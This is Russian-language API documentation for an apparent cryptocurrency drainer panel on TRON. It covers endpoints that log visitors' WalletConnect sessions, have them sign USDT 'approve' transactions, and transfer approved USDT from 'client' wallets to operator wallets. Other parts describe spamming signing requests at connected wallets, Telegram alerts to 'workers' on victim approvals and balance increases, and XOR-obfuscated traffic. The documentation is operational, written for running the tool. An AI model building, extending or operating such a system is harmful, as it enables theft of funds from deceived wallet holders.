# Admin API Documentation

## Обзор
Admin API предоставляет полный набор REST endpoints для управления системой TRON кошельков. Все роуты (кроме `/auth/login`) требуют JWT авторизации.

## Аутентификация
Все защищенные роуты требуют JWT токен в заголовке:
```
Authorization: Bearer <jwt_token>
```

---

## 🔐 AUTHENTICATION ROUTES

### POST `/admin/auth/login`
Авторизация в админ панели.

**Доступ:** Публичный  
**Тело запроса:**
```json
{
  "username": "admin",
  "password": "admin123"
}
```

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
    "admin": {
      "id": 1,
      "username": "admin",
      "last_login": "2025-07-18T10:30:00.000Z"
    }
  },
  "message": "Login successful"
}
```

### GET `/admin/auth/profile`
Получение информации о текущем администраторе.

**Доступ:** Требует авторизацию  
**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "id": 1,
    "username": "admin"
  }
}
```

### POST `/admin/auth/change-password`
Изменение пароля текущего администратора.

**Доступ:** Требует авторизацию  
**Тело запроса:**
```json
{
  "oldPassword": "admin123",
  "newPassword": "newPassword123"
}
```

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "message": "Password changed successfully"
  },
  "message": "Password changed successfully"
}
```

### POST `/admin/auth/create-admin`
Создание нового администратора.

**Доступ:** Требует авторизацию  
**Тело запроса:**
```json
{
  "username": "newadmin",
  "password": "password123"
}
```

**Ответ (201):**
```json
{
  "success": true,
  "data": {
    "id": 2,
    "username": "newadmin",
    "created_at": "2025-07-18T10:30:00.000Z"
  },
  "message": "Admin created successfully"
}
```

---

## 🌐 DOMAIN ROUTES

### GET `/admin/domains`
Получение списка всех доменов с пагинацией.

**Доступ:** Требует авторизацию  
**Query параметры:**
- `page` (number, default: 1) - Номер страницы
- `limit` (number, default: 10) - Количество элементов на странице
- `sortBy` (string, default: 'created_at') - Поле для сортировки
- `sortOrder` ('asc' | 'desc', default: 'desc') - Порядок сортировки

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "data": [
      {
        "id": 1,
        "worker_id": "worker123",
        "worker_nickname": "Worker One",
        "domain": "example.com",
        "chats": "[\"chat1\", \"chat2\"]",
        "metadata": "{\"name\": \"Example App\"}",
        "operator_wallet_address": "TRX...",
        "operator_wallet_privateKey": "...",
        "only_contract": true,
        "minimal_asset_amount": 10,
        "created_at": "2025-07-18T10:30:00.000Z",
        "updated_at": "2025-07-18T10:30:00.000Z"
      }
    ],
    "pagination": {
      "page": 1,
      "limit": 10,
      "total": 1,
      "totalPages": 1
    }
  }
}
```

### GET `/admin/domains/:id`
Получение домена по ID.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID домена

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "id": 1,
    "worker_id": "worker123",
    "worker_nickname": "Worker One",
    "domain": "example.com",
    // ... остальные поля
  }
}
```

### POST `/admin/domains`
Создание нового домена.

**Доступ:** Требует авторизацию  
**Тело запроса:**
```json
{
  "worker_id": "worker123",
  "worker_nickname": "Worker One",
  "domain": "example.com",
  "chats": "[\"chat1\", \"chat2\"]",
  "metadata": "{\"name\": \"Example App\"}",
  "operator_wallet_address": "TRX...",
  "operator_wallet_privateKey": "...",
  "only_contract": true,
  "minimal_asset_amount": 10
}
```

**Ответ (201):**
```json
{
  "success": true,
  "data": {
    "id": 1,
    "worker_id": "worker123",
    // ... остальные поля
  },
  "message": "Domain created successfully"
}
```

### PUT `/admin/domains/:id`
Обновление домена.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID домена

**Тело запроса:** Аналогично POST, но все поля опциональны

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "id": 1,
    // ... обновленные поля
  },
  "message": "Domain updated successfully"
}
```

### DELETE `/admin/domains/:id`
Удаление домена.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID домена

**Ответ (200):**
```json
{
  "success": true,
  "message": "Domain deleted successfully"
}
```

---

## 👛 WALLET ROUTES

### GET `/admin/wallets`
Получение списка всех кошельков с пагинацией.

**Доступ:** Требует авторизацию  
**Query параметры:** Аналогично доменам

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "data": [
      {
        "id": 1,
        "address": "TRX1234567890abcdef",
        "walletType": "walletconnect",
        "sessionId": "session123",
        "session": "{...}",
        "userAgent": "Mozilla/5.0...",
        "ipAddress": "192.168.1.1",
        "hostname": "example.com",
        "country": "US",
        "metadata": "{...}",
        "has_usdt_approval": true,
        "usdt_approval_txid": "tx123",
        "usdt_approval_date": "2025-07-18T10:30:00.000Z",
        "trxBalance": 100.5,
        "usdtBalance": 50.25,
        "lastBalanceUpdate": "2025-07-18T10:30:00.000Z",
        "created_at": "2025-07-18T10:30:00.000Z",
        "updated_at": "2025-07-18T10:30:00.000Z"
      }
    ],
    "pagination": {
      "page": 1,
      "limit": 10,
      "total": 1,
      "totalPages": 1
    }
  }
}
```

### GET `/admin/wallets/stats`
Получение статистики кошельков.

**Доступ:** Требует авторизацию  
**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "totalWallets": 150,
    "totalTrxBalance": 5000.75,
    "totalUsdtBalance": 25000.50,
    "walletsWithApproval": 85,
    "uniqueCountries": 25,
    "countries": ["US", "CA", "GB", "DE", ...]
  }
}
```

### GET `/admin/wallets/:id`
Получение кошелька по ID.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID кошелька

### GET `/admin/wallets/address/:address`
Получение кошелька по адресу.

**Доступ:** Требует авторизацию  
**Параметры:**
- `address` (string) - Адрес кошелька

### PUT `/admin/wallets/:id`
Обновление кошелька.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID кошелька

### DELETE `/admin/wallets/:id`
Удаление кошелька.

**Доступ:** Требует авторизацию  
**Параметры:**
- `id` (number) - ID кошелька

---

## ✅ CHECK ROUTES

### GET `/admin/checks`
Получение списка всех чеков с пагинацией.

**Доступ:** Требует авторизацию  
**Query параметры:**
- Стандартные параметры пагинации
- `status` (string, optional) - Фильтр по статусу ('active', 'expired')

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "data": [
      {
        "id": 1,
        "wallet_address": "TRX1234567890abcdef",
        "amount": 100.50,
        "check_data": "{...}",
        "raw_check": "base64string...",
        "timer_start": "2025-07-18T10:30:00.000Z",
        "timer_end": "2025-07-20T10:30:00.000Z",
        "status": "active",
        "hostname": "example.com",
        "ip_address": "192.168.1.1",
        "user_agent": "Mozilla/5.0...",
        "created_at": "2025-07-18T10:30:00.000Z",
        "updated_at": "2025-07-18T10:30:00.000Z"
      }
    ],
    "pagination": {
      "page": 1,
      "limit": 10,
      "total": 1,
      "totalPages": 1
    }
  }
}
```

### GET `/admin/checks/stats`
Получение статистики чеков.

**Доступ:** Требует авторизацию  
**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "totalChecks": 250,
    "activeChecks": 180,
    "totalAmount": 15000.75,
    "statusBreakdown": {
      "active": 180,
      "expired": 70
    }
  }
}
```

### GET `/admin/checks/:id`
Получение чека по ID.

### PUT `/admin/checks/:id`
Обновление чека.

### DELETE `/admin/checks/:id`
Удаление чека.

---

## ⛓️ BLOCKCHAIN WALLET MANAGEMENT ROUTES

### POST `/admin/blockchain/transfer-usdt-to-operator`
Перевод USDT с кошелька клиента на кошелек оператора.

**Доступ:** Требует авторизацию  
**Условия:** У кошелька должен быть `has_usdt_approval = true`

**Тело запроса:**
```json
{
  "walletId": 123,
  "amount": 100.50
}
```

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "success": true,
    "transactionId": "tx123456789",
    "amount": 100.50,
    "fromAddress": "TRX_client_address",
    "toAddress": "TRX_operator_address"
  },
  "message": "USDT transfer completed successfully"
}
```

### POST `/admin/blockchain/transfer-trx-from-operator`
Перевод TRX с кошелька оператора на указанный кошелек.

**Доступ:** Требует авторизацию  
**Тело запроса:**
```json
{
  "toAddress": "TRX_recipient_address",
  "amount": 50.25,
  "hostname": "example.com"
}
```

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "success": true,
    "transactionId": "tx987654321",
    "amount": 50.25,
    "fromAddress": "TRX_operator_address",
    "toAddress": "TRX_recipient_address"
  },
  "message": "TRX transfer completed successfully"
}
```

### POST `/admin/blockchain/spam-contracts`
Спам контрактами на подписание для WalletConnect кошельков.

**Доступ:** Требует авторизацию  
**Условия:** Кошелек должен быть типа 'walletconnect' с активной сессией

**Тело запроса:**
```json
{
  "walletId": 123,
  "contractCount": 5,
  "delayBetweenContracts": 2000
}
```

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "success": true,
    "walletAddress": "TRX_wallet_address",
    "totalContracts": 5,
    "successCount": 3,
    "failureCount": 2,
    "results": [
      {
        "contractNumber": 1,
        "success": true,
        "transactionId": "tx111"
      },
      {
        "contractNumber": 2,
        "success": false,
        "error": "User rejected transaction"
      }
      // ...
    ]
  },
  "message": "Contract spam completed"
}
```

### GET `/admin/blockchain/session-activity/:walletId`
Проверка активности сессии WalletConnect кошелька.

**Доступ:** Требует авторизацию  
**Параметры:**
- `walletId` (number) - ID кошелька

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "walletId": 123,
    "isActive": true
  },
  "message": "Session is active"
}
```

### GET `/admin/blockchain/balance/:address`
Получение актуального баланса кошелька из блокчейна.

**Доступ:** Требует авторизацию  
**Параметры:**
- `address` (string) - Адрес кошелька

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "address": "TRX_wallet_address",
    "trxBalance": 125.75,
    "usdtBalance": 500.25,
    "lastUpdate": "2025-07-18T10:30:00.000Z"
  },
  "message": "Wallet balance retrieved successfully"
}
```

### PUT `/admin/blockchain/update-balance/:walletId`
Обновление баланса кошелька в базе данных актуальными данными из блокчейна.

**Доступ:** Требует авторизацию  
**Параметры:**
- `walletId` (number) - ID кошелька

**Ответ (200):**
```json
{
  "success": true,
  "data": {
    "address": "TRX_wallet_address",
    "trxBalance": 125.75,
    "usdtBalance": 500.25,
    "lastUpdate": "2025-07-18T10:30:00.000Z"
  },
  "message": "Wallet balance updated successfully"
}
```

---

## 🚨 ERROR RESPONSES

Все ошибки возвращаются в стандартном формате:

**401 Unauthorized:**
```json
{
  "success": false,
  "error": "Access token required"
}
```

**403 Forbidden:**
```json
{
  "success": false,
  "error": "IP address not allowed"
}
```

**404 Not Found:**
```json
{
  "success": false,
  "error": "Resource not found"
}
```

**400 Bad Request:**
```json
{
  "success": false,
  "error": "Invalid request parameters"
}
```

**500 Internal Server Error:**
```json
{
  "success": false,
  "error": "Internal server error"
}
```

---

## 📝 LOGGING

Все админские действия логируются в консоль в формате:
```
[2025-07-18T10:30:00.000Z] Admin Action: CREATE_DOMAIN | Admin: admin (ID: 1) | IP: 192.168.1.1 | URL: /admin/domains
```

---

## 🔒 SECURITY NOTES

1. **JWT токены** истекают через 24 часа (настраивается через `JWT_EXPIRES_IN`)
2. **Секретный ключ** для JWT должен быть установлен в `JWT_SECRET`
3. **Пароли** администраторов хешируются с помощью bcrypt
4. **IP фильтрация** доступна через middleware (опционально)
5. **Все действия** логируются для аудита

---

## 🚀 QUICK START

1. Создайте первого администратора:
```bash
npm run create-admin
```

2. Авторизуйтесь:
```bash
curl -X POST http://localhost:3000/admin/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"admin123"}'
```

3. Используйте полученный токен для доступа к защищенным роутам:
```bash
curl -X GET http://localhost:3000/admin/wallets \
  -H "Authorization: Bearer YOUR_JWT_TOKEN"
```

# Balance Monitor Service

Сервис мониторинга балансов USDT кошельков в TRON сети.

## Функциональность

- **Автоматический мониторинг**: Проверяет балансы всех кошельков каждые 2 минуты
- **Уведомления**: Отправляет уведомления при увеличении USDT баланса
- **Пакетная обработка**: Проверяет кошельки группами по 10 для оптимизации
- **Статистика**: Предоставляет статистику по мониторингу
- **Ручная проверка**: Возможность проверить конкретный кошелек

## Основные методы

### `BalanceMonitorService.start()`
Запускает мониторинг балансов с интервалом 2 минуты.

### `BalanceMonitorService.stop()`
Останавливает мониторинг балансов.

### `BalanceMonitorService.getStatus()`
Возвращает статус сервиса (запущен/остановлен).

### `BalanceMonitorService.checkSingleWallet(address)`
Проверяет баланс конкретного кошелька вручную.

### `BalanceMonitorService.getMonitoringStats()`
Возвращает статистику мониторинга.

## Уведомления

При увеличении USDT баланса сервис отправляет уведомления через `NotificationService` с типом `balance_increase`.

Формат уведомления включает:
- Информацию о кошельке
- Старый и новый баланс USDT
- Размер увеличения
- Ссылки на Tronscan

## Интеграция

```typescript
import { BalanceMonitorService } from './services/balanceMonitorService';

// Запуск мониторинга
await BalanceMonitorService.start();

// Получение статистики
const stats = await BalanceMonitorService.getMonitoringStats();
console.log(stats);
```

## Зависимости

- Prisma ORM для работы с базой данных
- TronWeb для взаимодействия с блокчейном TRON
- NotificationService для отправки уведомлений
- Converter utils для конвертации значений

## Настройки

- **Интервал проверки**: 2 минуты (константа `CHECK_INTERVAL`)
- **Размер пакета**: 10 кошельков одновременно (константа `batchSize`)
- **USDT контракт**: `TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t`

# API Документация - Уведомления

## Обзор

API для тестирования и управления системой уведомлений Telegram. Все эндпоинты требуют авторизации через JWT токен.

## Базовый URL
```
http://localhost:3000/admin/notifications
```

## Аутентификация
Все запросы должны содержать JWT токен в заголовке:
```
Authorization: Bearer <your_jwt_token>
```

## Эндпоинты

### 1. Получить поддерживаемые типы уведомлений

**GET** `/types`

Возвращает список всех поддерживаемых типов уведомлений.

**Ответ:**
```json
{
  "success": true,
  "data": {
    "types": [
      "connection",
      "signed", 
      "send",
      "approved",
      "balance_increase",
      "insufficient_balance"
    ],
    "count": 6
  }
}
```

### 2. Получить домены с конфигурациями чатов

**GET** `/domains`

Возвращает список всех доменов с их конфигурациями Telegram чатов.

**Ответ:**
```json
{
  "success": true,
  "data": {
    "domains": [
      {
        "id": 1,
        "domain": "example.com",
        "worker_nickname": "worker1",
        "chats": [
          {
            "chat_id": "-123456789",
            "token": "bot_token_here",
            "types": {
              "connection": true,
              "approved": true,
              "signed": false
            }
          }
        ],
        "chatsCount": 1,
        "created_at": "2025-01-18T12:00:00.000Z"
      }
    ],
    "count": 1
  }
}
```

### 3. Валидировать конфигурацию чатов домена

**GET** `/domains/:domainId/validate`

Проверяет корректность конфигурации чатов для указанного домена.

**Параметры:**
- `domainId` (number) - ID домена

**Ответ:**
```json
{
  "success": true,
  "data": {
    "domain": "example.com",
    "chatsConfigured": true,
    "chatsCount": 1,
    "parseError": null,
    "chats": [
      {
        "index": 0,
        "chat_id": "-123456789",
        "token": "***2345",
        "hasTypes": true,
        "enabledTypes": ["connection", "approved"],
        "totalTypes": 6
      }
    ]
  }
}
```

### 4. Отправить тестовое уведомление

**POST** `/test`

Отправляет тестовое уведомление указанного типа с моковыми данными.

**Тело запроса:**
```json
{
  "type": "connection",
  "domainId": 1  // опционально, если не указан - берется первый домен с чатами
}
```

**Ответ:**
```json
{
  "success": true,
  "message": "Test notification of type 'connection' sent successfully",
  "data": {
    "type": "connection",
    "domain": "example.com",
    "mockData": {
      "id": "TEST_1737200000000",
      "nickname": "worker1",
      "worker": "test-worker-001",
      "hostname": "example.com",
      "ip": "192.168.1.100",
      "from": "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t",
      "operator": "TLsV52sRDL79HXGGm9yzwKiW6SLumaGNHF",
      "metadata": {
        "name": "Test Wallet",
        "version": "1.0.0"
      },
      "total": 1250.75,
      "assets": [
        {
          "symbol": "TRX",
          "balance": 1000.50,
          "usdValue": 85.25
        },
        {
          "symbol": "USDT", 
          "balance": 1165.50,
          "usdValue": 1165.50
        }
      ]
    }
  }
}
```

### 5. Отправить все типы тестовых уведомлений

**POST** `/test-all`

Отправляет тестовые уведомления всех поддерживаемых типов.

**Тело запроса:**
```json
{
  "domainId": 1  // опционально
}
```

**Ответ:**
```json
{
  "success": true,
  "message": "Test notifications sent for domain 'example.com'",
  "data": {
    "domain": "example.com",
    "results": [
      {
        "type": "connection",
        "status": "success",
        "message": "Sent successfully"
      },
      {
        "type": "approved",
        "status": "success", 
        "message": "Sent successfully"
      },
      {
        "type": "signed",
        "status": "error",
        "message": "Telegram API error: chat not found"
      }
    ],
    "totalSent": 5,
    "totalFailed": 1
  }
}
```

## Моковые данные

Для каждого типа уведомления генерируются соответствующие моковые данные:

### Connection
- Информация о подключенном кошельке
- Список доступных активов (TRX, USDT)
- Общий баланс в USD

### Approved
- Данные об одобренной транзакции USDT
- Сумма в nano единицах
- Метод (approve)
- Тестовый txID

### Signed
- Информация о подписанной транзакции
- Токен информация (USDT)
- USD стоимость
- Тестовый txID

### Send
- Базовая информация об отправленной транзакции
- Сумма и USD стоимость
- Тестовый txID

### Balance Increase
- Изменения баланса TRX и USDT
- Старые и новые значения
- Разница (+/-)
- Общее увеличение в USD

### Insufficient Balance
- Текущий баланс TRX
- Требуемая комиссия
- Недостающая сумма TRX
- Тестовый txID

## Коды ошибок

- `400` - Неверные параметры запроса
- `401` - Не авторизован
- `404` - Домен не найден
- `500` - Внутренняя ошибка сервера

## Примеры использования

### Curl примеры

```bash
# Получить поддерживаемые типы
curl -H "Authorization: Bearer <token>" \
  http://localhost:3000/admin/notifications/types

# Отправить тестовое уведомление подключения
curl -X POST \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"type": "connection", "domainId": 1}' \
  http://localhost:3000/admin/notifications/test

# Отправить все типы уведомлений
curl -X POST \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"domainId": 1}' \
  http://localhost:3000/admin/notifications/test-all
```

### JavaScript/Fetch примеры

```javascript
// Получить домены с чатами
const response = await fetch('/admin/notifications/domains', {
  headers: {
    'Authorization': `Bearer ${token}`,
    'Content-Type': 'application/json'
  }
});
const domains = await response.json();

// Отправить тестовое уведомление
const testResponse = await fetch('/admin/notifications/test', {
  method: 'POST',
  headers: {
    'Authorization': `Bearer ${token}`,
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    type: 'approved',
    domainId: 1
  })
});
const result = await testResponse.json();
```

## Логирование

Все действия с уведомлениями логируются с соответствующими action типами:
- `VIEW_NOTIFICATION_TYPES`
- `VIEW_DOMAINS_WITH_CHATS` 
- `VALIDATE_DOMAIN_CHATS`
- `SEND_TEST_NOTIFICATION`
- `SEND_ALL_TEST_NOTIFICATIONS`

Логи можно просматривать через journalctl или в файлах логов системы.

# Public API Documentation

## Обзор
Public API предоставляет endpoints для работы с WalletConnect, обработки транзакций и чеков.

---

## 🔗 WALLETCONNECT ROUTES

### POST `/api/fetchWalletConnect`
Инициализация подключения WalletConnect.

**Тело запроса:**
```json
{
  "id": "unique_session_id"
}
```

**Ответ (SSE Stream):**
```
data: encrypted_json_string

// События:
// 1. connection - URI для QR кода
// 2. wallet - информация о подключенном кошельке  
// 3. transactions - информация о транзакциях
```

**Расшифрованные события:**
```json
// Событие connection
{
  "event": "connection",
  "uri": "wc:1234567890abcdef@2?bridge=..."
}

// Событие wallet
{
  "event": "wallet", 
  "addr": "TRX1234567890abcdef"
}

// Событие transactions
{
  "event": "transactions",
  "count": 1,
  "total": 0
}
```

---

## 🔄 TRANSACTION ROUTES

### POST `/api/buildTransactions`
Построение транзакций для подписания.

**Тело запроса:**
```json
{
  "id": "session_id",
  "data": "encrypted_data"
}
```

**Расшифрованные данные:**
```json
{
  "executor": "TRX_wallet_address",
  "target": "target_info"
}
```

**Ответ (200):**
```json
{
  "data": "encrypted_response"
}
```

**Расшифрованный ответ:**
```json
{
  "transactions": [
    {
      "txID": "transaction_id",
      "token": "USDT",
      "method": "approve",
      "amount": "1000000000",
      "usd_price": 100.50
    }
  ],
  "total": 1
}
```

### POST `/api/sendTransaction`
Отправка подписанной транзакции в сеть.

**Тело запроса:**
```json
{
  "data": "encrypted_transaction_data"
}
```

**Расшифрованные данные:**
```json
{
  "transaction": {
    "signature": "...",
    "txID": "...",
    // ... другие поля транзакции
  }
}
```

**Ответ (200):**
```json
{}
```

---

## ✅ CHECK ROUTES

### POST `/api/check`
Обработка чека.

**Тело запроса (с шифрованием):**
```json
{
  "data": "encrypted_check_data"
}
```

**Тело запроса (без шифрования):**
```json
{
  "check": "base64_encoded_check_data"
}
```

**Расшифрованные данные чека:**
```json
{
  "check": "eyJ0aW1lc3RhbXAiOjE2ODk2NzIwMDAsIndhbGxldF9hZGRyZXNzIjoiVFJYMTIzNCIsImFtb3VudCI6MTAwfQ=="
}
```

**Декодированный чек (base64):**
```json
{
  "timestamp": 1689672000,
  "wallet_address": "TRX1234567890abcdef", 
  "amount": 100.50
}
```

**Или текстовый формат:**
```
1689672000
TRX1234567890abcdef
100.50
```

**Ответ (200, с шифрованием):**
```json
{
  "data": "encrypted_response"
}
```

**Ответ (200, без шифрования):**
```json
{
  "success": true,
  "check": {
    "id": 1,
    "wallet_address": "TRX1234567890abcdef",
    "amount": 100.50,
    "timer_start": "2025-07-18T10:30:00.000Z",
    "timer_end": "2025-07-20T10:30:00.000Z",
    "status": "active"
  },
  "timer": {
    "START_TIME_MSK": "2025-07-18T10:30:00.000Z",
    "END_TIME_MSK": "2025-07-20T10:30:00.000Z", 
    "DURATION_SECONDS": 172800,
    "REMAINING_SECONDS": 169200,
    "WALLET_ADDRESS": "TRX1234567890abcdef",
    "AMOUNT": 100.50,
    "CHECK_ID": 1,
    "STATUS": "active"
  },
  "message": "Check processed successfully"
}
```

### GET `/api/check/:id`
Получение информации о чеке по ID.

**Параметры:**
- `id` (number) - ID чека

**Ответ (200):**
```json
{
  "success": true,
  "check": {
    "id": 1,
    "wallet_address": "TRX1234567890abcdef",
    "amount": 100.50,
    "status": "active",
    "created_at": "2025-07-18T10:30:00.000Z"
  },
  "timer": {
    "start_time": "2025-07-18T10:30:00.000Z",
    "end_time": "2025-07-20T10:30:00.000Z",
    "remaining_seconds": 169200,
    "is_expired": false
  }
}
```

### GET `/api/checks/wallet/:address`
Получение всех чеков для кошелька.

**Параметры:**
- `address` (string) - Адрес кошелька

**Ответ (200):**
```json
{
  "success": true,
  "checks": [
    {
      "id": 1,
      "wallet_address": "TRX1234567890abcdef",
      "amount": 100.50,
      "status": "active",
      "created_at": "2025-07-18T10:30:00.000Z"
    }
  ],
  "count": 1
}
```

### GET `/api/checks/stats`
Получение статистики чеков.

**Ответ (200):**
```json
{
  "success": true,
  "stats": {
    "total_checks": 150,
    "active_checks": 120,
    "expired_checks": 30,
    "total_amount": 15000.75
  }
}
```

### PUT `/api/check/:id/status`
Обновление статуса чека.

**Параметры:**
- `id` (number) - ID чека

**Тело запроса:**
```json
{
  "status": "expired"
}
```

**Ответ (200):**
```json
{
  "success": true,
  "check": {
    "id": 1,
    "status": "expired",
    // ... остальные поля
  },
  "message": "Check status updated successfully"
}
```

---

## 📢 NOTIFICATION ROUTES

### POST `/api/notification`
Обработка уведомлений.

**Тело запроса:**
```json
{
  "data": "encrypted_notification_data"
}
```

**Расшифрованные данные:**
```json
{
  "type": "notification_type",
  // ... другие поля уведомления
}
```

**Ответ (200):**
```json
{}
```

---

## 🔐 ENCRYPTION

API использует XOR шифрование с ключом из `Constants.encrypt_key`.

**Шифрование данных:**
```typescript
const encryptedData = Encryptor.xorConvert(JSON.stringify(data), Constants.encrypt_key);
```

**Расшифровка данных:**
```typescript
const decryptedData = JSON.parse(Encryptor.xorConvert(encryptedData, Constants.encrypt_key));
```

---

## 🚨 ERROR RESPONSES

**400 Bad Request:**
```json
{
  "success": false,
  "error": "Invalid request data"
}
```

**500 Internal Server Error:**
```json
{
  "success": false, 
  "error": "Internal server error"
}
```

---

## 📋 NOTES

1. **SSE Responses** - `/api/fetchWalletConnect` возвращает Server-Sent Events поток
2. **Encryption** - Некоторые endpoints поддерживают как зашифрованные, так и открытые данные
3. **Base64 Checks** - Чеки могут быть в JSON или текстовом формате, закодированные в base64
4. **Timer Logic** - Чеки автоматически истекают через 48 часов
5. **WalletConnect** - Автоматическое создание записи кошелька при успешном подключении
